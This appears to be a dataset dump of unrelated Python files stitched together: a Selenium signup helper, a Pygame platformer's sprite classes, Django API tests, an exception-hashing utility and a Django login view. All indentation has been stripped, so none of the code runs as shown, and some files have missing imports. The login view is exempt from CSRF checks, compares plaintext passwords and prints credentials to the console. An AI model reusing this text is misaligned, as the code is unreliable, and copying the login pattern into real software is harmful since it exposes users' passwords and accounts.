import quopri
class SignupHelper:
def __init__(self, app):
self.app = app
def new_user(self, username, email, password):
wd = self.app.wd
wd.get(self.app.config['web']['baseUrl'] + "/signup_page.php")
wd.find_element_by_name("username").click()
wd.find_element_by_name("username").clear()
wd.find_element_by_name("username").send_keys(username)
wd.find_element_by_name("email").click()
wd.find_element_by_name("email").clear()
wd.find_element_by_name("email").send_keys(email)
wd.find_element_by_xpath("//input[@type='submit']").click()
mail = self.app.mail.get_mail(username, password, '[MantisBT] Account registration')
url = self.extract_confirmation_url(mail)
wd.get(url)
wd.find_element_by_name("realname").click()
wd.find_element_by_name("realname").clear()
wd.find_element_by_name("realname").send_keys(username)
wd.find_element_by_name("password").click()
wd.find_element_by_name("password").clear()
wd.find_element_by_name("password").send_keys(password)
wd.find_element_by_name("password_confirm").click()
wd.find_element_by_name("password_confirm").clear()
wd.find_element_by_name("password_confirm").send_keys(password)
wd.find_element_by_xpath("//button[@type='submit']").click()
def extract_confirmation_url(self, text):
body = quopri.decodestring(text).decode('utf-8')
return re.search("http://.*", body).group(0)
|
StarcoderdataPython
|
1661456
|
class Biblioteca:
def chama_metodo_interface(self):
self.metodo_interface()
|
StarcoderdataPython
|
371488
|
<reponame>BigShuang/Sort-Animation
#usr/bin/env python
#-*- coding:utf-8- -*-
FPS = 60 # 游戏帧率
QUICKFPS = 60
SLOWFPS = 15
WIN_WIDTH = 800 # 窗口宽度
WIN_HEIGHT = 980 # 窗口高度
BUBBLE_SPACE = 40
INIT_R = 10
DR = 4
NUMBER = 10
COLORS = {
"bg": (240, 255, 255), # 背景颜色
"bubble": (135, 206, 235),
# "select": (135, 206, 235),
"select": (0, 139, 139),
"current": (0, 0, 0),
"line": (0, 139, 139),
# "line": (173, 216, 230),
}
|
StarcoderdataPython
|
5072290
|
"""
A Python parser for Org mode files.
"""
__all__ = ['OrgTree', 'orgTreeFromFile'] # Seems equal to the stuff in ".tree" below
from .tree import OrgTree, orgTreeFromFile
from . import const, utils
|
StarcoderdataPython
|
3264627
|
<filename>RecoBTag/Combined/test/writeGBRForests_cfg.py
import FWCore.ParameterSet.Config as cms
process = cms.Process("writeGBRForests")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1) # NB: needs to be set to 1 so that GBRForestWriter::analyze method gets called exactly once
)
process.source = cms.Source("EmptySource")
process.load('Configuration/StandardSequences/Services_cff')
process.gbrForestWriter = cms.EDAnalyzer("GBRForestWriter",
jobs = cms.VPSet(
cms.PSet(
inputFileName = cms.FileInPath('RecoBTag/Combined/data/CombinedMVAV2_13_07_2015.weights.xml.gz'),
inputFileType = cms.string("XML"),
inputVariables = cms.vstring("Jet_CSV", "Jet_CSVIVF", "Jet_JP", "Jet_JBP", "Jet_SoftMu", "Jet_SoftEl"),
spectatorVariables = cms.vstring(),
methodName = cms.string("BDT"),
outputFileType = cms.string("SQLLite"),
outputRecord = cms.string("btag_CombinedMVAv2_BDT_TMVAv420_74X_v1")
)
)
)
process.load("CondCore.DBCommon.CondDBCommon_cfi")
process.CondDBCommon.connect = 'sqlite_file:btag_CombinedMVAv2_BDT_TMVAv420_GBRForest_74X_v1.db'
process.PoolDBOutputService = cms.Service("PoolDBOutputService",
process.CondDBCommon,
timetype = cms.untracked.string('runnumber'),
toPut = cms.VPSet(
cms.PSet(
record = cms.string('btag_CombinedMVAv2_BDT_TMVAv420_74X_v1'),
tag = cms.string('btag_CombinedMVAv2_BDT_TMVAv420_74X_v1'),
label = cms.untracked.string('btag_CombinedMVAv2_BDT')
)
)
)
process.p = cms.Path(process.gbrForestWriter)
|
StarcoderdataPython
|
5008607
|
<gh_stars>0
import turtle
class Score:
def __init__(self, coordinates, font):
self.__count = 0
self.__coordinates = coordinates
self.__font = font
self.__pen = turtle.Turtle()
def init_score(self):
self.__pen.goto(*self.__coordinates)
self.__pen.hideturtle()
self.__pen.color('white')
self.__pen.write(self.__count, font=self.__font)
def change_and_write_score(self):
self.__count += 1
self.__pen.clear()
self.__pen.write(self.__count, font=self.__font)
|
StarcoderdataPython
|
100679
|
import itertools
from unittest import skip
from django.core import urlresolvers
from rest_framework.test import APIClient, APIRequestFactory
from rest_framework.test import APITestCase, force_authenticate
from api.tests.factories import (
UserFactory, AnonymousUserFactory, IdentityFactory, ProviderFactory, AllocationSourceFactory,
UserAllocationSourceFactory
)
from api.v2.views import AllocationSourceViewSet as ViewSet
class AllocationSourceTests(APITestCase):
def setUp(self):
self.anonymous_user = AnonymousUserFactory()
self.user_without_sources = UserFactory.create(username='test-username')
self.user_with_sources = UserFactory.create(username='test-username-with-sources')
self.provider = ProviderFactory.create()
self.user_identity = IdentityFactory.create_identity(
created_by=self.user_without_sources,
provider=self.provider)
self.user_identity = IdentityFactory.create_identity(
created_by=self.user_with_sources,
provider=self.provider)
self.allocation_source_1 = AllocationSourceFactory.create(name='TG-TRA110001',
compute_allowed=1000)
self.allocation_source_2 = AllocationSourceFactory.create(name='TG-TRA220002',
compute_allowed=2000)
self.allocation_source_3 = AllocationSourceFactory.create(name='TG-TRA330003',
compute_allowed=3000)
UserAllocationSourceFactory.create(user=self.user_with_sources, allocation_source=self.allocation_source_1)
UserAllocationSourceFactory.create(user=self.user_with_sources, allocation_source=self.allocation_source_2)
def test_can_create_allocation_source(self):
"""Can I even create an allocation source?"""
client = APIClient()
client.force_authenticate(user=self.user_without_sources)
allocation_source = AllocationSourceFactory.create(name='TG-TRA990001',
compute_allowed=9000)
expected_values = {
'name': 'TG-TRA990001',
'compute_allowed': 9000
}
self.assertDictContainsSubset(expected_values, allocation_source.__dict__)
def test_anonymous_user_cant_see_allocation_sources(self):
request_factory = APIRequestFactory()
list_view = ViewSet.as_view({'get': 'list'})
url = urlresolvers.reverse('api:v2:allocationsource-list')
self.assertEqual(url, '/api/v2/allocation_sources')
request = request_factory.get(url)
force_authenticate(request, user=self.anonymous_user)
response = list_view(request)
self.assertEqual(response.status_code, 403)
self.assertEqual(response.status_text, 'Forbidden')
def test_loggedin_user_with_no_sources_cant_see_allocation_sources(self):
request_factory = APIRequestFactory()
list_view = ViewSet.as_view({'get': 'list'})
url = urlresolvers.reverse('api:v2:allocationsource-list')
self.assertEqual(url, '/api/v2/allocation_sources')
request = request_factory.get(url)
force_authenticate(request, user=self.user_without_sources)
response = list_view(request)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.status_text, 'OK')
self.assertEqual(response.data['count'], 0)
def test_loggedin_user_can_list_allocation_sources(self):
request_factory = APIRequestFactory()
list_view = ViewSet.as_view({'get': 'list'})
url = urlresolvers.reverse('api:v2:allocationsource-list')
self.assertEqual(url, '/api/v2/allocation_sources')
request = request_factory.get(url)
force_authenticate(request, user=self.user_with_sources)
response = list_view(request)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.status_text, 'OK')
expected_values = [
{
'name': 'TG-TRA110001',
'compute_allowed': 1000
},
{
'name': 'TG-TRA220002',
'compute_allowed': 2000
}
]
self.assertEqual(response.data['count'], len(expected_values))
for allocation_source, expected_dict in itertools.izip_longest(expected_values, response.data['results']):
self.assertDictContainsSubset(allocation_source, expected_dict)
@skip('TODO: Figure out why it fails')
def test_loggedin_user_can_get_allocation_source(self):
request_factory = APIRequestFactory()
retrieve_view = ViewSet.as_view({'get': 'retrieve'})
url = urlresolvers.reverse('api:v2:allocationsource-detail', args=(self.allocation_source_1.id,))
self.assertEqual(url, '/api/v2/allocation_sources/{}'.format(self.allocation_source_1.id))
request = request_factory.get(url)
force_authenticate(request, user=self.user_with_sources)
response = retrieve_view(request)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.status_text, 'OK')
|
StarcoderdataPython
|
3592535
|
<filename>backend/notifications/forms.py
from django import forms
from django.utils.safestring import mark_safe
class NewsletterForm(forms.Form):
email = forms.EmailField(label="Email Address")
class ContactForm(forms.Form):
name = forms.CharField(label="Name", max_length=255)
email = forms.EmailField(label="Email Address")
message = forms.CharField(label="Your Message", widget=forms.Textarea)
substack_sign_up = forms.BooleanField(
label=mark_safe('<span class="italic">Sign me up for David\'s newsletter!</span>'), required=False, initial=True
)
|
StarcoderdataPython
|
3513139
|
from .lightning import Lightning
from .customer import Customer
from .onchain import Onchain
from .wallet import Wallet
from .base import webhook_verification
|
StarcoderdataPython
|
9604874
|
import random
import os
import time
import capnp
import matplotlib.pyplot as plt
import numpy as np
from dist_zero import cgen
def test_pass_buffer_c_to_python():
program = cgen.Program(name='simple_buffer_perf_test')
globalBuf = program.AddDeclaration(cgen.Char.Star().Var('global_buffer'))
nGlobalBufBytes = 10 * 1000 * 1000
initGlobalBuf = program.AddExternalFunction(name='InitGlobalBuf', args=None)
initGlobalBuf.AddAssignment(globalBuf, cgen.malloc(cgen.Constant(nGlobalBufBytes)).Cast(cgen.Char.Star()))
index = initGlobalBuf.AddDeclaration(cgen.MachineInt.Var('index'), cgen.Zero)
loop = initGlobalBuf.AddWhile(index < cgen.Constant(nGlobalBufBytes))
loop.AddAssignment(globalBuf.Sub(index), cgen.Constant(120))
loop.AddAssignment(index, index + cgen.One)
initGlobalBuf.AddReturn(cgen.PyBool_FromLong(cgen.Constant(1)))
vSize = cgen.Int32.Var('size')
f = program.AddExternalFunction(name='F', args=[vSize])
f.AddReturn(cgen.PyBytes_FromStringAndSize(globalBuf, vSize))
#f.AddReturn(cgen.PyMemoryView_FromMemory(globalBuf, vSize, cgen.Zero))
mod = program.build_and_import()
# Initialize the global buffer
mod.InitGlobalBuf()
def test_i(i):
n_samples = 200
start = time.time()
for x in range(n_samples):
start = time.time()
bs = mod.F(i)
if len(bs) != i:
raise RuntimeError("Bad length")
if bs[2:3] != b'x':
raise RuntimeError("Bad char")
duration = time.time() - start
return duration / n_samples
xs, ys = [], []
for i in range(100, 5000 * 1000, 10000):
print(f"testing {i}")
xs.append(i / 1000000)
ys.append(test_i(i) * 1000000)
fig, ax = plt.subplots()
ax.plot(xs, ys)
ax.set(xlabel='size of buffer (megabytes)', ylabel='time to pass and receive from c extension (microseconds)')
plt.show()
def test_pass_buffer_python_to_c():
program = cgen.Program(name='simple_buffer_perf_test')
vArgs = cgen.PyObject.Star().Var('args')
f = program.AddExternalFunction(name='F', args=None)
vBuf = f.AddDeclaration(cgen.UInt8.Star().Var('buf'))
vBuflen = f.AddDeclaration(cgen.MachineInt.Var('buflen'))
whenParseFail = f.AddIf(
cgen.PyArg_ParseTuple(vArgs, cgen.StrConstant("s#"), vBuf.Address(), vBuflen.Address()).Negate()).consequent
whenParseFail.AddReturn(cgen.PyLong_FromLong(cgen.Constant(0)))
resultBuf = cgen.PyObject.Star().Var('result')
f.AddReturn(cgen.PyLong_FromLong(vBuflen))
mod = program.build_and_import()
buffers = [''.join('x' for x in range(i * 7000)).encode('utf-8') for i in range(10, 5000, 180)]
def test_buf(buf):
n_samples = 200
start = time.time()
for i in range(n_samples):
flen = mod.F(buf)
if len(buf) != flen:
raise RuntimeError("Bad length")
duration = time.time() - start
return duration / n_samples
fig, ax = plt.subplots()
xs, ys = [], []
print('running tests')
for buf in buffers:
buflen = len(buf) / 1000000
buftime = 1000000 * test_buf(buf)
xs.append(buflen)
ys.append(buftime)
print(f'finished test of size {buflen}')
ax.plot(xs, ys)
ax.set(xlabel='size of buffer (megabytes)', ylabel='time to pass and receive from c extension (microseconds)')
plt.show()
if __name__ == '__main__':
#test_pass_buffer_python_to_c()
test_pass_buffer_c_to_python()
|
StarcoderdataPython
|
6659121
|
"""Define tests for the QNAP QSW init."""
from unittest.mock import patch
from homeassistant.components.qnap_qsw.const import DOMAIN
from homeassistant.config_entries import ConfigEntryState
from homeassistant.core import HomeAssistant
from .util import CONFIG
from tests.common import MockConfigEntry
async def test_unload_entry(hass: HomeAssistant) -> None:
"""Test unload."""
config_entry = MockConfigEntry(
domain=DOMAIN, unique_id="qsw_unique_id", data=CONFIG
)
config_entry.add_to_hass(hass)
with patch(
"homeassistant.components.qnap_qsw.QnapQswApi.validate",
return_value=None,
), patch(
"homeassistant.components.qnap_qsw.QnapQswApi.update",
return_value=None,
):
assert await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
assert config_entry.state is ConfigEntryState.LOADED
await hass.config_entries.async_unload(config_entry.entry_id)
await hass.async_block_till_done()
assert config_entry.state is ConfigEntryState.NOT_LOADED
|
StarcoderdataPython
|
5079878
|
# i used some ideas from CodePylet https://www.youtube.com/watch?v=osDofIdja6s&t=1038s
# i also borrowed pretty much all of this from kids can code - thanks!
# on acceleration https://www.khanacademy.org/science/physics/one-dimensional-motion/kinematic-formulas/v/average-velocity-for-constant-acceleration
# on vectors: https://www.youtube.com/watch?v=ml4NSzCQobk
# I used a lot of different aspects of code from Mr. Cozort
# I got a lot of information from https://www.pygame.org/docs/
import pygame as pg
from pygame.sprite import Sprite
import random
from random import randint, randrange, choice
from settings import *
vec = pg.math.Vector2
class Spritesheet:
# class for loading and parsing sprite sheets
def __init__(self, filename):
self.spritesheet = pg.image.load(filename).convert()
def get_image(self, x, y, width, height, scalefactor):
image = pg.Surface((width, height))
image.blit(self.spritesheet, (0,0), (x, y, width, height))
image = pg.transform.scale(image, (width // scalefactor, height // scalefactor))
return image
class Player(Sprite):
def __init__(self, game):
# allows layering in LayeredUpdates sprite group - thanks pygame!
self._layer = PLAYER_LAYER
# add player to game groups when instantiated
self.groups = game.all_sprites
Sprite.__init__(self, self.groups)
self.game = game
self.walking = False
self.jumping = False
self.current_frame = 0
self.last_update = 0
self.load_images()
self.image = self.standing_frames[0]
self.image.set_colorkey(BLACK)
self.rect = self.image.get_rect()
self.rect.center = (WIDTH / 2, HEIGHT /2)
self.pos = vec(WIDTH / 2, HEIGHT / 2)
self.vel = vec(0, 0)
self.acc = vec(0, 0)
print("adding vecs " + str(self.vel + self.acc))
def load_images(self):
# Loads the player images based on whether or not the player has bought the purple bunny
if self.game.boughtpurple == False:
self.standing_frames = [self.game.spritesheet.get_image(690, 406, 120, 201, 3),
self.game.spritesheet.get_image(614, 1063, 120, 191, 3)
]
for frame in self.standing_frames:
frame.set_colorkey(BLACK)
self.walk_frames_r = [self.game.spritesheet.get_image(678, 860, 120, 201, 3),
self.game.spritesheet.get_image(692, 1458, 120, 207, 3)
]
self.walk_frames_l = []
for frame in self.walk_frames_r:
frame.set_colorkey(BLACK)
self.walk_frames_l.append(pg.transform.flip(frame, True, False))
self.jump_frame = self.game.spritesheet.get_image(382, 763, 150, 181, 3)
self.jump_frame.set_colorkey(BLACK)
if self.game.boughtpurple == True:
self.standing_frames = [self.game.spritesheet.get_image(581, 1265, 121, 191, 3),
self.game.spritesheet.get_image(584, 0, 121, 201, 3)
]
for frame in self.standing_frames:
frame.set_colorkey(BLACK)
self.walk_frames_r = [self.game.spritesheet.get_image(584, 203, 121, 201, 3),
self.game.spritesheet.get_image(678, 651, 121, 207, 3)
]
self.walk_frames_l = []
for frame in self.walk_frames_r:
frame.set_colorkey(BLACK)
self.walk_frames_l.append(pg.transform.flip(frame, True, False))
self.jump_frame = self.game.spritesheet.get_image(416, 1660, 150, 181, 3)
self.jump_frame.set_colorkey(BLACK)
def update(self):
self.animate()
self.acc = vec(0, PLAYER_GRAV)
keys = pg.key.get_pressed()
# If b is pressed and you already bought bubble and it is not on cooldown: then it instantiates a bubble
if keys[pg.K_b] and self.game.boughtbubble == True and self.game.bubblecooldown == 0:
Bubble(self.game, self)
self.game.bubblecooldown = 1000
# The speed the player goes depends on which sprite the player has bought: The purple one being faster
if keys[pg.K_a] or keys[pg.K_LEFT]:
if self.game.boughtpurple == False:
self.acc.x = -PLAYER_ACC
if self.game.boughtpurple == True:
self.acc.x = -0.8
if keys[pg.K_d] or keys[pg.K_RIGHT]:
if self.game.boughtpurple == False:
self.acc.x = PLAYER_ACC
if self.game.boughtpurple == True:
self.acc.x = 0.8
# set player friction
self.acc.x += self.vel.x * PLAYER_FRICTION
# equations of motion
self.vel += self.acc
if abs(self.vel.x) < 0.1:
self.vel.x = 0
self.pos += self.vel + 0.5 * self.acc
# jump to other side of screen
if self.pos.x > WIDTH + self.rect.width / 2:
self.pos.x = 0 - self.rect.width / 2
if self.pos.x < 0 - self.rect.width / 2:
self.pos.x = WIDTH + self.rect.width / 2
self.rect.midbottom = self.pos
# cuts the jump short when the space bar is released
def jump_cut(self):
if self.jumping:
if self.vel.y < -5:
self.vel.y = -5
def jump(self):
print("jump is working")
# check pixel below
self.rect.y += 2
hits = pg.sprite.spritecollide(self, self.game.platforms, False)
# adjust based on checked pixel
self.rect.y -= 2
# only allow jumping if player is on platform
if hits and not self.jumping:
# play sound only when space bar is hit and while not jumping
self.game.jump_sound[choice([0,1])].play()
# tell the program that player is currently jumping
self.jumping = True
self.vel.y = -PLAYER_JUMP
print(self.acc.y)
def animate(self):
# gets time in miliseconds
now = pg.time.get_ticks()
if self.vel.x != 0:
self.walking = True
else:
self.walking = False
# Changes frames of player to imitate animation
if self.walking:
if now - self.last_update > 200:
self.last_update = now
self.current_frame = (self.current_frame + 1) % len(self.walk_frames_l)
bottom = self.rect.bottom
if self.vel.x > 0:
self.image = self.walk_frames_r[self.current_frame]
else:
self.image = self.walk_frames_l[self.current_frame]
self.rect = self.image.get_rect()
self.rect.bottom = bottom
# checks state
if not self.jumping and not self.walking:
# gets current delta time and checks against 200 miliseconds
if now - self.last_update > 200:
self.last_update = now
self.current_frame = (self.current_frame + 1) % len(self.standing_frames)
# reset bottom for each frame of animation
bottom = self.rect.bottom
self.image = self.standing_frames[self.current_frame]
self.rect = self.image.get_rect()
self.rect.bottom = bottom
class Cloud(Sprite):
def __init__(self, game):
# allows layering in LayeredUpdates sprite group
self._layer = CLOUD_LAYER
# add clouds to game groups when instantiated
self.groups = game.all_sprites, game.clouds
Sprite.__init__(self, self.groups)
self.game = game
# Randomly chooses a cloud image to use
self.image = choice(self.game.cloud_images)
self.image.set_colorkey(BLACK)
self.rect = self.image.get_rect()
scale = randrange (50, 101) / 100
self.image = pg.transform.scale(self.image, (int(self.rect.width * scale),
int(self.rect.height * scale)))
self.rect.x = randrange(WIDTH - self.rect.width)
self.rect.y = randrange(-500, -50)
self.speed = randrange(1,3)
def update(self):
if self.rect.top > HEIGHT * 2:
self.kill
''' mr cozort added animated clouds and made it so they
restart on the other side of the screen'''
self.rect.x += self.speed
if self.rect.x > WIDTH:
self.rect.x = -self.rect.width
class Platform(Sprite):
def __init__(self, game, x, y):
# allows layering in LayeredUpdates sprite group
self._layer = PLATFORM_LAYER
# add Platforms to game groups when instantiated
self.groups = game.all_sprites, game.platforms
Sprite.__init__(self, self.groups)
self.game = game
# Changes platform skin based on how high the player score is
if game.score < 500:
images = [self.game.spritesheet.get_image(0, 288, 380, 94, 2), self.game.spritesheet.get_image(213, 1662, 201, 100, 2)]
elif game.score < 1000:
images = [self.game.spritesheet.get_image(0, 768, 380, 94, 2), self.game.spritesheet.get_image(213, 1764, 201, 100, 2)]
elif game.score < 2000:
images = [self.game.spritesheet.get_image(0, 576, 380, 94, 2), self.game.spritesheet.get_image(218, 1456, 201, 100, 2)]
if game.score >= 2000:
images = [self.game.spritesheet.get_image(0, 96, 380, 94, 2), self.game.spritesheet.get_image(382, 408, 200, 100, 2)]
self.image = random.choice(images)
self.image.set_colorkey(BLACK)
self.rect = self.image.get_rect()
self.rect.x = x
self.rect.y = y
# Spawns coins and enemies on platform
if random.randrange(100) < COIN_SPAWN_PCT:
Coin(self.game, self)
elif random.randrange(100) < MOB2_SPAWN_PCT:
Mob2(self.game, self)
print("Mob2 is working")
# I made this
class Coin(Sprite):
def __init__(self, game, plat):
# allows layering in LayeredUpdates sprite group
self._layer = COIN_LAYER
# add a groups property where we can pass all instances of this object into game groups
self.groups = game.all_sprites, game.coins
Sprite.__init__(self, self.groups)
self.game = game
self.plat = plat
self.load_frames()
self.image = self.turning_frames[0]
self.current_frame = 0
self.image.set_colorkey(BLACK)
self.rect = self.image.get_rect()
self.rect.centerx = self.plat.rect.centerx
self.rect.bottom = self.plat.rect.top - 5
self.last_update = 0
self.descendanim = False
def update(self):
self.animate()
self.rect.bottom = self.plat.rect.top - 5
# checks to see if plat is in the game's platforms group so we can kill the powerup instance
if not self.game.platforms.has(self.plat):
self.kill()
def load_frames(self):
# loads animation frames
self.turning_frames = [self.game.spritesheet.get_image(698, 1931, 84, 84, 2),
self.game.spritesheet.get_image(829, 0, 66, 84, 2),
self.game.spritesheet.get_image(897, 1574, 50, 84, 2),
self.game.spritesheet.get_image(645, 651, 15, 84, 2)]
for frame in self.turning_frames:
frame.set_colorkey(BLACK)
def animate(self):
now = pg.time.get_ticks()
# creates a back and forth type of animation that makes it look like its spinning
if self.current_frame == 3:
self.descendanim = True
if self.current_frame == 0:
self.descendanim = False
if now - self.last_update > 150:
self.last_update = now
# added values for the rect.centerx accomodate for off center sprite formatting
# elif format allows for a single if statement to pass at one time, which makes it display one frame at a time and animate correctly
if self.current_frame == 0 and self.descendanim == False:
self.current_frame = 1
self.image = self.turning_frames[self.current_frame]
self.rect.centerx = self.plat.rect.centerx + 4.5
elif self.current_frame == 1 and self.descendanim == False:
self.current_frame = 2
self.image = self.turning_frames[self.current_frame]
self.rect.centerx = self.plat.rect.centerx + 8.5
elif self.current_frame == 2 and self.descendanim == False:
self.current_frame = 3
self.image = self.turning_frames[self.current_frame]
self.rect.centerx = self.plat.rect.centerx + 17.25
elif self.current_frame == 3 and self.descendanim == True:
self.current_frame = 2
self.image = pg.transform.flip(self.turning_frames[self.current_frame], True, False)
self.rect.centerx = self.plat.rect.centerx + 8.5
elif self.current_frame == 2 and self.descendanim == True:
self.current_frame = 1
self.image = pg.transform.flip(self.turning_frames[self.current_frame], True, False)
self.rect.centerx = self.plat.rect.centerx + 4.5
elif self.current_frame == 1 and self.descendanim == True:
self.current_frame = 0
self.image = pg.transform.flip(self.turning_frames[self.current_frame], True, False)
self.rect.centerx = self.plat.rect.centerx
class Mob(Sprite):
def __init__(self, game):
# allows layering in LayeredUpdates sprite group
self._layer = MOB_LAYER
# add a groups property where we can pass all instances of this object into game groups
self.groups = game.all_sprites, game.mobs
Sprite.__init__(self, self.groups)
self.game = game
self.image_up = self.game.spritesheet.get_image(566, 510, 122, 139, 3)
self.image_up.set_colorkey(BLACK)
self.image_down = self.game.spritesheet.get_image(568, 1534, 122, 135, 3)
self.image_down.set_colorkey(BLACK)
self.image = self.image_up
self.image.set_colorkey(BLACK)
self.rect = self.image.get_rect()
self.rect.centerx = choice([-100, WIDTH + 100])
self.rect_top = self.rect.top
self.vx = randrange(1, 4)
if self.rect.centerx > WIDTH:
self.vx *= -1
self.rect.y = randrange(HEIGHT/2)
self.vy = 0
self.dy = 0.5
def update(self):
self.rect.x += self.vx
self.vy += self.dy
self.rect_top = self.rect.top
if self.vy > 3 or self.vy < -3:
self.dy *= -1
center = self.rect.center
if self.dy < 0:
self.image = self.image_up
else:
self.image = self.image_down
self.rect.center = center
self.rect_top = self.rect.top
self.rect.y += self.vy
if self.rect.left > WIDTH + 100 or self.rect.right < -100:
self.kill()
# I made this
class Mob2(Sprite):
def __init__(self, game, plat):
# allows layering in LayeredUpdates sprite group
self._layer = MOB_LAYER
# add a groups property where we can pass all instances of this object into game groups
self.groups = game.all_sprites, game.mobs
Sprite.__init__(self, self.groups)
self.game = game
# assigns it to a platform
self.plat = plat
self.load_images()
self.image = self.walkright[0]
self.image.set_colorkey(BLACK)
self.rect = self.image.get_rect()
self.rect.centerx = self.plat.rect.centerx
self.rect.bottom = self.plat.rect.top
self.vx = 1
self.currentframe = 1
self.last_update = 0
def update(self):
# Keeps the Mob2 from going outside the boundaries of the platform
if self.rect.right == self.plat.rect.right:
self.vx = -1
if self.rect.left == self.plat.rect.left:
self.vx = 1
self.animate()
# makes the mob move left and right
self.rect.x = self.rect.x + self.vx
# moves the mob with the platform
self.rect.bottom = self.plat.rect.top
# kills the mob along with the platform
if self.rect.bottom + 5 >= HEIGHT:
self.kill()
def animate(self):
now = pg.time.get_ticks()
# creates walking animation based on direction of walking
if now - self.last_update > 150:
self.last_update = now
if self.vx == 1:
if self.currentframe == 1:
self.currentframe = 0
self.image = self.walkright[self.currentframe]
elif self.currentframe == 0:
self.currentframe = 1
self.image = self.walkright[self.currentframe]
elif self.vx == -1:
if self.currentframe == 1:
self.currentframe = 0
self.image = self.walkleft[self.currentframe]
elif self.currentframe == 0:
self.currentframe = 1
self.image = self.walkleft[self.currentframe]
def load_images(self):
# loads animation frames
self.walkright = [self.game.spritesheet.get_image(704, 1256, 120, 159, 3),
self.game.spritesheet.get_image(812, 296, 90, 155, 3)
]
for frame in self.walkright:
frame.set_colorkey(BLACK)
self.walkleft = [pg.transform.flip(self.walkright[0], True, False),
pg.transform.flip(self.walkright[1], True, False)
]
for frame in self.walkleft:
frame.set_colorkey(BLACK)
# I made this
class Bubble(Sprite):
def __init__(self, game, play1):
# allows layering in LayeredUpdates sprite group
self._layer = BUBBLE_LAYER
# add a groups property where we can pass all instances of this object into game groups
self.game = game
self.groups = game.all_sprites, game.bubbles
Sprite.__init__(self, self.groups)
self.player = play1
self.image = self.game.spritesheet.get_image(0, 1662, 211, 215, 2).convert_alpha()
self.rect = self.image.get_rect()
self.rect.center = self.player.rect.center
# adds transparency
alpha = 70
pixels = pg.PixelArray(self.image)
pixels.replace((0, 0, 0, 255), (0, 0, 0, 0))
self.image.fill((255, 255, 255, alpha), None, pg.BLEND_RGBA_MULT)
def update(self):
# keeps the bubble centered on the player
self.rect.center = self.player.rect.center
# I made this
class Coinmob(Sprite):
def __init__(self, game):
# allows layering in LayeredUpdates sprite group
self._layer = MOB_LAYER
# add a groups property where we can pass all instances of this object into game groups
self.groups = game.all_sprites, game.coinmobs
Sprite.__init__(self, self.groups)
self.game = game
self.image_up = self.game.spritesheet.get_image(382, 510, 182, 123, 3)
self.image_up.set_colorkey(BLACK)
self.image_down = self.game.spritesheet.get_image(382, 635, 174, 126, 3)
self.image_down.set_colorkey(BLACK)
self.image = self.image_up
self.image.set_colorkey(BLACK)
self.rect = self.image.get_rect()
self.rect.centerx = choice([-100, WIDTH + 100])
self.rect_top = self.rect.top
self.vx = randrange(1, 4)
if self.rect.centerx > WIDTH:
self.vx *= -1
self.rect.y = randrange(HEIGHT/2)
self.vy = 0
self.dy = 0.5
def update(self):
# Used Mob() movement system
self.rect.x += self.vx
self.vy += self.dy
self.rect_top = self.rect.top
if self.vy > 3 or self.vy < -3:
self.dy *= -1
center = self.rect.center
if self.dy < 0:
self.image = self.image_up
else:
self.image = self.image_down
self.rect.center = center
self.rect_top = self.rect.top
self.rect.y += self.vy
if self.rect.left > WIDTH + 100 or self.rect.right < -100:
self.kill()
|
StarcoderdataPython
|
9791849
|
<filename>preprocess.py
import numpy
import cv2
RAW_SHAPE = (160, 320, 3)
def preprocess(image):
assert(image.shape == RAW_SHAPE)
image = crop(image)
image = resize(image)
image = standardize(image)
return numpy.array(image, dtype='float32')
def crop(image):
return image[50:-30,:,:]
def resize(image):
__resize = lambda x: int(x * 0.5)
shape = image.shape
resized_wh = (__resize(shape[1]), __resize(shape[0]))
return cv2.resize(image, resized_wh)
def standardize(image):
return (image / 255.0 - 0.5) * 2.0
INPUT_SHAPE = preprocess(numpy.empty(RAW_SHAPE)).shape
|
StarcoderdataPython
|
1655384
|
from django.http import HttpResponse
from django.shortcuts import render
from django.views.decorators.csrf import csrf_exempt
from loginmodule.models import Login
@csrf_exempt
def login(request):
print ("buhuuu")
for key in request.POST:
print(key)
value = request.POST[key]
print(value)
userEmail = request.POST.get("inputEmail","")
userPassword = request.POST.get("inputPassword","")
isAdminCheck = request.POST.get("isAdminCheck","")
type = 'user'
if isAdminCheck == 'on':
type = 'admin'
try:
# get your models
dbUser = Login.objects.get(email = userEmail)
if dbUser.password == userPassword:
request.session['user'] = dbUser.name
request.session['userEmail'] = dbUser.email
request.session['type'] = dbUser.type
print ("db user email "+dbUser.email)
curUser = request.session.get('user', 'none')
curUserEmail = request.session.get('userEmail', 'none')
print ("printing session data "+curUser + " " +curUserEmail)
return render(request, 'mainmodule/home.html', {"userName" : dbUser.name, "userEmail" : dbUser.email})
else:
return render(request, 'mainmodule/loginerror.html')
except Login.DoesNotExist:
# do something
return render(request, 'mainmodule/loginerror.html')
def logout(request, dumbEntry):
print ("logout entered")
curUser = request.session.get('user', 'none')
curUserEmail = request.session.get('userEmail', 'none')
print ("logout: curUser = "+curUser + ", curUserEmail = "+curUserEmail)
request.session['user'] = 'none'
request.session['userEmail'] = 'none'
request.session['type'] = 'none'
return render(request, 'mainmodule/home.html')
|
StarcoderdataPython
|
5198272
|
"""
Small library for providing unique identifier to similar exceptions
1) we check just filename and function name
2) we don't check line numbers because they often change e.g. by unrelated changes
3) we check exception type but not message as the message can often differ for similar problems
the code is public-domain
written by <NAME>
"""
import os
import re
import sys
import hashlib
EXC_MAPPING = {
AttributeError: r"'(\w+)' object has no attribute '(\w+)'",
}
def _get_exception_attributes(exc_class, exc):
regex = EXC_MAPPING.get(exc_class)
if not regex:
return []
match = re.fullmatch(regex, str(exc))
if not match:
return []
return match.groups()
def format_exception(exc_info=None, root=None):
if not exc_info:
exc_info = sys.exc_info()
exc_class, exc, traceback = exc_info
rows = []
while traceback:
code = traceback.tb_frame.f_code
filename = code.co_filename
if root:
filename = os.path.relpath(filename, root)
if not rows or rows[-1] != (filename, code.co_name):
rows.append((filename, code.co_name))
traceback = traceback.tb_next
rows.append(exc_class.__name__)
attributes = _get_exception_attributes(exc_class, exc)
rows.extend(attributes)
return rows
def exception_id(**kwargs):
return hashlib.md5(str(format_exception(**kwargs)).encode()).hexdigest()
|
StarcoderdataPython
|
142418
|
<gh_stars>1-10
from django.shortcuts import redirect
def unauthenticated_user_only(view_func):
def wrapper(request):
if request.user.is_authenticated:
return redirect('index')
return view_func(request)
return wrapper
